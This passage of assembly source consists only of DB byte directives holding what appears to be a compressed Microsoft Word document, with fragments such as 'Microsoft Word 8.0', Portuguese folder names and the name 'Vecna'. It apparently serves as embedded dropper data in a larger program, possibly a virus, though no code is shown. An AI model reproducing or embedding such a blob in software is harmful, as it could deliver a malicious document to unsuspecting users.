DB 06CH,002H,088H,061H,000H,064H,002H,022H,072H,002H,0A0H,064H,002H,00EH,074H
|
|||
|
DB 000H,0D4H,005H,0FFH,001H,003H,068H,056H,002H,042H,000H,002H,088H,004H,007H
|
|||
|
DB 00AH,005H,010H,003H,091H,002H,000H,025H,000H,054H,0B5H,0A8H,002H,035H,06DH
|
|||
|
DB 002H,0DFH,06CH,002H,059H,003H,0EBH,050H,002H,0D7H,06FH,000H,06AH,002H,016H
|
|||
|
DB 063H,002H,0FBH,02EH,002H,020H,080H,060H,068H,000H,069H,000H,073H,000H,044H
|
|||
|
DB 002H,055H,063H,000H,075H,000H,06DH,002H,01AH,013H,015H,02EH,014H,035H,000H
|
|||
|
DB 041H,002H,00EH,074H,002H,016H,045H,000H,078H,002H,014H,063H,012H,083H,011H
|
|||
|
DB 003H,072H,003H,053H,045H,000H,0A8H,0A2H,04DH,000H,050H,002H,0A0H,041H,002H
|
|||
|
DB 03FH,045H,002H,00AH,052H,002H,0A6H,04AH,000H,045H,002H,0B8H,054H,002H,0A0H
|
|||
|
DB 0A8H,01AH,054H,000H,048H,002H,0BAH,053H,002H,053H,04FH,002H,012H,055H,002H
|
|||
|
DB 02CH,045H,012H,0A4H,003H,01AH,041H,000H,055H,055H,01CH,002H,032H,04FH,002H
|
|||
|
DB 02AH,058H,002H,004H,043H,002H,0B0H,040H,000H,080H,003H,055H,002H,00AH,002H
|
|||
|
DB 003H,0E8H,020H,082H,04FH,001H,002H,066H,009H,010H,002H,013H,004H,003H,002H
|
|||
|
DB 010H,004H,007H,000H,002H,01DH,000H,000H,020H,000H,000H,008H,000H,010H,001H
|
|||
|
DB 040H,000H,000H,003H,002H,014H,047H,016H,090H,002H,02EH,002H,002H,006H,003H
|
|||
|
DB 005H,004H,005H,0F8H,056H,002H,003H,004H,003H,014H,002H,017H,008H,003H,002H
|
|||
|
DB 01DH,004H,00CH,054H,002H,0E3H,003H,0D9H,073H,002H,03EH,04EH,002H,0CDH,077H
|
|||
|
DB 02DH,000H,002H,008H,052H,002H,0DBH,023H,034H,06EH,002H,022H,035H,010H,090H
|
|||
|
DB 001H,002H,000H,005H,005H,001H,002H,0C0H,08BH,001H,007H,006H,002H,005H,007H
|
|||
|
DB 002H,013H,003H,003H,007H,077H,003H,00CH,080H,003H,005H,053H,000H,079H,012H
|
|||
|
DB 021H,026H,0BCH,062H,002H,03AH,023H,06AH,033H,022H,004H,07EH,00BH,006H,004H
|
|||
|
DB 002H,003H,001H,00FH,07EH,004H,0AEH,003H,036H,041H,012H,073H,016H,000H,069H
|
|||
|
DB 012H,07FH,003H,034H,022H,012H,0FBH,030H,008H,088H,018H,000H,000H,0C4H,002H
|
|||
|
DB 000H,000H,0A9H,0C1H,05CH,004H,0A1H,078H,01CH,033H,066H,07AH,002H,004H,003H
|
|||
|
DB 02CH,001H,000H,002H,017H,003H,009H,004H,004H,001H,004H,044H,004H,0F8H,0FDH
|
|||
|
DB 000H,003H,010H,004H,029H,004H,014H,013H,006H,003H,00EH,003H,004H,003H,011H
|
|||
|
DB 024H,00FH,0F5H,003H,015H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,03FH,0F8H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,006H,010H,013H
|
|||
|
DB 0CCH,058H,001H,0FFH,0FFH,012H,006H,010H,007H,007H,03BH,0EEH,00BH,00CH,007H
|
|||
|
DB 020H,0FFH,0FFH,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,0FDH,0FFH,00BH,010H,0FFH,00FH,001H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0F3H
|
|||
|
DB 000H,00FH,010H,00EH,010H,0FEH,0FFH,0F3H,02FH,0B3H,04AH,0ABH,016H,0D3H,006H
|
|||
|
DB 000H,000H,0E0H,085H,09FH,0F2H,0F9H,04FH,000H,0E8H,068H,010H,0ABH,091H,008H
|
|||
|
DB 000H,02BH,027H,0B3H,0D9H,030H,002H,023H,050H,0D2H,019H,0D3H,0B9H,002H,007H
|
|||
|
DB 06CH,055H,000H,088H,002H,010H,003H,03AH,090H,002H,008H,0D3H,027H,09CH,002H
|
|||
|
DB 008H,004H,002H,004H,0A8H,002H,004H,005H,002H,004H,0B8H,0ABH,05AH,002H,004H
|
|||
|
DB 0D3H,0EDH,0C4H,002H,008H,008H,002H,004H,0D4H,002H,004H,009H,002H,004H,0E4H
|
|||
|
DB 002H,004H,0B3H,0B4H,0F0H,002H,008H,00AH,04DH,055H,002H,004H,00CH,002H,04DH
|
|||
|
DB 0F2H,0F1H,000H,018H,002H,008H,00DH,002H,010H,024H,002H,008H,00EH,002H,008H
|
|||
|
DB 030H,002H,008H,00FH,0ADH,0D6H,002H,008H,038H,002H,008H,003H,074H,040H,002H
|
|||
|
DB 008H,013H,002H,010H,048H,002H,008H,003H,078H,0E4H,002H,06DH,01EH,002H,010H
|
|||
|
DB 002H,00FH,029H,0E0H,002H,006H,073H,000H,00FH,00CH,006H,002H,016H,056H,065H
|
|||
|
DB 063H,06EH,061H,000H,066H,009H,01CH,002H,010H,003H,028H,0C1H,00DH,003H,098H
|
|||
|
DB 04EH,06FH,072H,06DH,061H,0E2H,037H,003H,010H,009H,02CH,000H,004H,02CH,003H
|
|||
|
DB 060H,031H,000H,063H,06EH,003H,000H,003H,01CH,003H,074H,04DH,069H,063H,072H
|
|||
|
DB 06FH,073H,06FH,066H,074H,020H,057H,06FH,072H,064H,018H,014H,020H,038H,02EH
|
|||
|
DB 012H,00DH,0F2H,027H,000H,000H,08CH,086H,047H,002H,067H,000H,004H,00CH,0B0H
|
|||
|
DB 0E8H,03DH,010H,0FFH,0B8H,065H,0BEH,001H,004H,00CH,03CH,06FH,085H,003H,00CH
|
|||
|
DB 013H,018H,003H,0A0H,003H,008H,003H,028H,00FH,008H,01EH,08FH,00FH,00FH,0FFH
|
|||
|
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0E0H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FEH,0FFH,000H,000H,004H
|
|||
|
DB 000H,0E3H,0EEH,0E3H,09EH,009H,004H,001H,000H,003H,012H,002H,0D5H,0CDH,0D5H
|
|||
|
DB 09CH,02EH,01BH,010H,093H,097H,008H,000H,02BH,02CH,0F9H,054H,067H,0AEH,044H
|
|||
|
DB 002H,01FH,005H,00EH,014H,02CH,0E2H,0DDH,0E8H,002H,018H,0F3H,0C0H,002H,00BH
|
|||
|
DB 000H,068H,002H,00CH,0F3H,0B4H,070H,0B5H,0AAH,002H,008H,005H,002H,004H,07CH
|
|||
|
DB 002H,004H,0F3H,05CH,084H,002H,008H,011H,002H,004H,08CH,002H,004H,017H,002H
|
|||
|
DB 004H,094H,002H,004H,0DAH,0AAH,00BH,002H,004H,09CH,002H,004H,0F3H,0DCH,0A4H
|
|||
|
DB 002H,008H,0F3H,068H,0ACH,002H,008H,016H,002H,004H,0B4H,002H,004H,00DH,002H
|
|||
|
DB 004H,076H,0E1H,0BCH,002H,004H,003H,05CH,0C9H,002H,008H,003H,094H,0F7H,0F4H
|
|||
|
DB 004H,002H,010H,032H,039H,041H,000H,0F3H,050H,003H,078H,00BH,008H,0C3H,03BH
|
|||
|
DB 002H,01BH,004H,018H,0B3H,00DH,008H,000H,003H,064H,003H,010H,00FH,008H,007H
|
|||
|
DB 010H,01EH,002H,07DH,003H,040H,003H,004H,000H,00CH,017H,0D8H,002H,00DH,003H
|
|||
|
DB 065H,0F3H,0F5H,007H,002H,036H,054H,0EDH,074H,075H,06CH,06FH,004H,04CH,003H
|
|||
|
DB 020H,098H,002H,013H,003H,068H,059H,05DH,002H,007H,000H,020H,002H,005H,003H
|
|||
|
DB 014H,036H,002H,008H,002H,002H,004H,03EH,002H,004H,003H,010H,003H,00CH,00AH
|
|||
|
DB 002H,00CH,05FH,000H,02BH,050H,049H,044H,05FH,047H,055H,049H,044H,014H,05CH
|
|||
|
DB 003H,0B6H,041H,002H,016H,04EH,002H,004H,07BH,000H,0FAH,0FDH,030H,00EH,002H
|
|||
|
DB 02DH,008H,010H,00FH,00AH,003H,02AH,009H,014H,003H,00EH,00BH,004H,07DH,002H
|
|||
|
DB 04EH,003H,003H,01FH,0D5H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
|
|||
|
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00BH,010H,07DH,0BDH,0E7H,0B4H,003H,0E2H,049H,0F3H
|
|||
|
DB 054H,0F3H,0B4H,0F3H,0B0H,0E3H,0FFH,0FEH,002H,029H,009H,002H,018H,0E3H,0D0H
|
|||
|
DB 0F3H,030H,0F3H,088H,00DH,002H,010H,0DEH,07AH,00EH,002H,004H,0F3H,0E4H,003H
|
|||
|
DB 020H,0F3H,0D4H,012H,002H,010H,0F3H,0BCH,014H,002H,008H,015H,002H,004H,0F3H
|
|||
|
DB 0C0H,0F3H,0E4H,003H,020H,019H,055H,05BH,002H,010H,01AH,002H,004H,01BH,002H
|
|||
|
DB 004H,01CH,002H,004H,01DH,002H,004H,0F3H,05FH,01FH,002H,008H,003H,020H,0FDH
|
|||
|
DB 002H,064H,022H,0ADH,0AAH,002H,00CH,028H,002H,004H,003H,010H,025H,002H,008H
|
|||
|
DB 026H,002H,004H,027H,002H,004H,029H,002H,004H,031H,002H,004H,02AH,002H,004H
|
|||
|
DB 0AAH,0FAH,02BH,002H,004H,02CH,002H,004H,02DH,002H,004H,02EH,002H,004H,02FH
|
|||
|
DB 002H,004H,030H,002H,004H,003H,034H,003H,004H,002H,047H,00FH,003H,0FFH,0FFH
|
|||
|
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
|
|||
|
DB 00FH,010H,047H,000H,00FH,010H,00FH,010H,004H,010H,052H,000H,06FH,002H,002H
|
|||
|
DB 074H,000H,020H,000H,045H,000H,06EH,000H,074H,010H,000H,000H,072H,000H,079H
|
|||
|
DB 012H,056H,020H,050H,072H,06FH,067H,072H,061H,06DH,061H,073H,000H,000H,008H
|
|||
|
DB 041H,052H,051H,055H,049H,056H,07EH,031H,000H,028H,000H,013H,08CH,000H,000H
|
|||
|
DB 028H,026H,000H,000H,0D1H,023H,010H,000H,04DH,069H,063H,072H,06FH,073H,06FH
|
|||
|
DB 066H,016H,000H,005H,001H,047H,024H,004H,049H,002H,005H,023H,044H,006H,009H
|
|||
|
DB 002H,002H,040H,000H,000H,0C0H,004H,006H,000H,046H,003H,007H,0A2H,0D8H,000H
|
|||
|
DB 080H,008H,000H,02BH,030H,030H,09DH,0C0H,0B1H,0E1H,09BH,0B8H,065H,0BEH,001H
|
|||
|
DB 024H,002H,015H,006H,040H,040H,023H,021H,002H,008H,031H,000H,054H,000H,061H
|
|||
|
DB 000H,062H,000H,06CH,000H,065H,002H,00EH,026H,000H,080H,04DH,017H,011H,000H
|
|||
|
DB 041H,072H,071H,075H,069H,076H,06FH,073H,020H,064H,065H,00FH,088H,081H,001H
|
|||
|
DB 00FH,088H,010H,000H,00EH,000H,002H,000H,002H,07BH,008H,003H,000H,04DH,049H
|
|||
|
DB 043H,052H,04FH,053H,050H,000H,07EH,032H,000H,01EH,008H,0B0H,0DAH,003H,0B0H
|
|||
|
DB 06FH,064H,065H,06CH,06FH,073H,000H,04DH,04FH,008H,020H,044H,045H,008H,002H
|
|||
|
DB 06AH,000H,010H,000H,000H,026H,003H,000H,0F0H,057H,002H,0FEH,072H,000H,008H
|
|||
|
DB 07EH,064H,000H,044H,002H,008H,063H,000H,075H,000H,06DH,002H,088H,013H,008H
|
|||
|
DB 003H,023H,00FH,004H,00FH,010H,003H,010H,01AH,0F8H,047H,000H,002H,001H,033H
|
|||
|
DB 034H,007H,081H,003H,014H,00FH,004H,00FH,010H,004H,010H,002H,080H,003H,008H
|
|||
|
DB 005H,000H,053H,004H,076H,06DH,0ABH,0EAH,012H,006H,013H,07CH,049H,012H,086H
|
|||
|
DB 066H,002H,08CH,072H,002H,08AH,061H,012H,090H,069H,002H,00CH,06EH,003H,029H
|
|||
|
DB 00FH,004H,006H,010H,0FEH,0E3H,028H,002H,080H,013H,072H,033H,0BCH,003H,084H
|
|||
|
DB 006H,017H,00FH,007H,00CH,010H,004H,07BH,004H,005H,000H,000H,005H,00FH,0FAH
|
|||
|
DB 00FH,090H,00FH,090H,0FDH,056H,00EH,090H,038H,002H,080H,003H,078H,007H,004H
|
|||
|
DB 00CH,069H,00FH,00DH,006H,010H,018H,003H,008H,006H,080H,04DH,002H,0F8H,063H
|
|||
|
DB 022H,076H,06FH,07CH,0F4H,000H,073H,003H,016H,00FH,004H,00FH,010H,00FH,010H
|
|||
|
DB 022H,000H,001H,001H,001H,002H,016H,00CH,002H,004H,043H,0A4H,002H,007H,00FH
|
|||
|
DB 003H,010H,083H,000H,080H,092H,064H,024H,078H,0A0H,010H,0DAH,004H,008H,00BH
|
|||
|
DB 021H,056H,000H,042H,000H,041H,00BH,011H,0C7H,0C7H,00FH,00CH,00FH,010H,00EH
|
|||
|
DB 010H,008H,000H,001H,028H,080H,053H,034H,00EH,01FH,004H,00FH,007H,080H,0C0H
|
|||
|
DB 047H,0C9H,00FH,080H,022H,0FEH,0E8H,0FFH,068H,000H,069H,002H,0FCH,044H,012H
|
|||
|
DB 058H,02FH,080H,004H,03DH,00FH,005H,00EH,010H,023H,080H,053H,0A4H,023H,0D4H
|
|||
|
DB 013H,084H,00EH,01FH,00FH,00FH,0FDH,0FFH,008H,010H,096H,053H,0E5H,002H,00EH
|
|||
|
DB 013H,03CH,023H,040H,033H,0BCH,023H,044H,023H,0CCH,003H,01BH,003H,0CCH,003H
|
|||
|
DB 054H,003H,05CH,06FH,000H,067H,000H,013H,0C3H,0BFH,0EAH,06FH,000H,06BH,000H
|
|||
|
DB 013H,0E8H,067H,000H,053H,0A4H,06FH,000H,020H,002H,080H,021H,002H,004H,022H
|
|||
|
DB 002H,004H,023H,002H,004H,043H,018H,06BH,000H,05FH,055H,063H,014H,063H,004H
|
|||
|
DB 06FH,000H,06BH,000H,043H,094H,032H,002H,03CH,033H,002H,004H,034H,002H,004H
|
|||
|
DB 035H,002H,004H,036H,002H,004H,037H,055H,055H,002H,004H,038H,002H,004H,039H
|
|||
|
DB 002H,004H,03AH,002H,004H,03BH,002H,004H,03CH,002H,004H,03DH,002H,004H,03EH
|
|||
|
DB 002H,004H,03FH,0ADH,05AH,002H,004H,040H,002H,004H,013H,0FCH,042H,002H,008H
|
|||
|
DB 043H,002H,004H,044H,002H,004H,045H,002H,004H,043H,0B5H,047H,002H,008H,048H
|
|||
|
DB 0ABH,0AAH,002H,004H,003H,0B8H,04AH,002H,008H,04BH,002H,004H,04CH,002H,004H
|
|||
|
DB 04DH,002H,004H,04EH,002H,004H,04FH,002H,004H,050H,002H,004H,0EAH,0AAH,051H
|
|||
|
DB 002H,004H,052H,002H,004H,053H,002H,004H,003H,02CH,003H,004H,056H,002H,00CH
|
|||
|
DB 057H,002H,004H,058H,002H,004H,059H,002H,004H,0F6H,07FH,05AH,002H,004H,003H
|
|||
|
DB 018H,05CH,006H,008H,013H,0A8H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,001H,0E0H,0FCH,016H,001H,000H
|
|||
|
DB 001H,0B6H,022H,0C3H,034H,046H,002H,008H,0FFH,0FFH,002H,0A6H,004H,008H,005H
|
|||
|
DB 00AH,003H,00EH,00FH,004H,00FH,010H,0BFH,055H,00BH,010H,023H,015H,023H,04DH
|
|||
|
DB 023H,049H,023H,045H,008H,069H,001H,023H,04FH,003H,00EH,078H,002H,02FH,0DEH
|
|||
|
DB 002H,004H,0F7H,022H,078H,0F5H,00FH,0D8H,022H,080H,003H,014H,002H,00FH,032H
|
|||
|
DB 049H,000H,000H,08DH,09AH,08FH,09AH,000H,002H,07EH,023H,00FH,088H,002H,015H
|
|||
|
DB 003H,034H,0AFH,01DH,002H,007H,00FH,003H,009H,010H,003H,0A5H,013H,002H,070H
|
|||
|
DB 0D6H,002H,013H,003H,004H,0EBH,023H,0C5H,002H,041H,003H,018H,000H,000H,0DFH
|
|||
|
DB 0F3H,07FH,002H,00AH,002H,019H,000H,00CH,002H,008H,003H,067H,00FH,004H,00FH
|
|||
|
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,009H,010H,023H,0CCH
|
|||
|
DB 002H,028H,085H,000H,053H,04CH,003H,012H,000H,002H,0EBH,053H,010H,008H,00AH
|
|||
|
DB 094H,005H,00AH,000H,000H,002H,03CH,005H,00AH,004H,054H,0FFH,0FFH,015H,08DH
|
|||
|
DB 001H,000H,04EH,000H,030H,000H,07BH,002H,004H,030H,002H,004H,032H,002H,004H
|
|||
|
DB 039H,0B1H,01EH,002H,004H,036H,000H,02DH,002H,006H,003H,012H,030H,00CH,00AH
|
|||
|
DB 043H,006H,016H,009H,01EH,005H,024H,005H,006H,034H,000H,036H,000H,08CH,000H
|
|||
|
DB 07DH,000H,019H,0A2H,0DDH,036H,002H,000H,0DFH,033H,0E1H,013H,086H,001H,001H
|
|||
|
DB 080H,012H,01EH,0CCH,03FH,002H,081H,023H,09DH,003H,07BH,0FFH,0FFH,003H,0A7H
|
|||
|
DB 013H,080H,002H,017H,004H,003H,005H,016H,015H,04DH,093H,0BBH,033H,0A3H,00CH
|
|||
|
DB 011H,07CH,0FAH,01AH,002H,00BH,018H,00FH,00CH,003H,039H,007H,014H,003H,008H
|
|||
|
DB 00DH,000H,0A3H,035H,094H,003H,017H,004H,004H,093H,0B7H,003H,018H,003H,004H
|
|||
|
DB 0DFH,0FFH,003H,011H,022H,081H,002H,007H,022H,009H,002H,006H,000H,002H,0C5H
|
|||
|
DB 003H,080H,003H,01CH,005H,076H,003H,00AH,00FH,032H,003H,014H,00BH,004H,004H
|
|||
|
DB 039H,002H,005H,00FH,0FDH,007H,014H,002H,00BH,01FH,0F1H,007H,01BH,0FFH,002H
|
|||
|
DB 000H,070H,002H,01FH,04DH,032H,0E8H,005H,013H,002H,00DH,002H,02CH,005H,006H
|
|||
|
DB 015H,077H,01FH,0E1H,003H,00CH,00FH,004H,00FH,010H,00FH,010H,007H,010H,0FEH
|
|||
|
DB 0CAH,001H,002H,0EEH,022H,081H,008H,000H,013H,064H,004H,016H,002H,00CH,0DFH
|
|||
|
